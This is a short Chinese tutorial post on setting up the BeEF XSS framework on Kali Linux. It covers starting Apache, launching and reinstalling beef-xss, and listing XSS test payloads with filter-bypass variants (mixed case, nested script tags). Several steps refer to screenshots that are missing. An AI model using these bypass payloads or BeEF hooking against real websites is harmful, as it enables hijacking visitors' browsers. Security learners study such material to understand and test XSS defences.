一、Kali开启网络监听:
service apache2 start
二、启动 Kali beef-xss 模块:
beef-xss
如果需要查看密码路径root权限,可以用以下指令:
vi /etc/beef-xss/config.yaml
其它指令,如下:
apt-get remove beef-xss //卸载beef-xss apt-get purge beef-xss //删除beef-xss配置 rm -r /usr/share/beef-xss/ //重点,彻底删除beef-xss所有的用户配置,0保留 apt-get install beef-xss //重新输入密码后,就可以正常使用了
三、复制脚本,如下图所示:
四、链接执行xss木马形式:
五、链接本地成功查看:
六、发起:
payload:
正常方式 <script>alert(1)</script>
大小写方式绕过 <ScRiPt>alert(1)</ScRiPt>
乱排序绕过 <scr<script>ipt>alert(1)</scr<script>ipt>
标签:xss,beef,get,kali,apt,alert From: https://www.cnblogs.com/n5you/p/17579926.html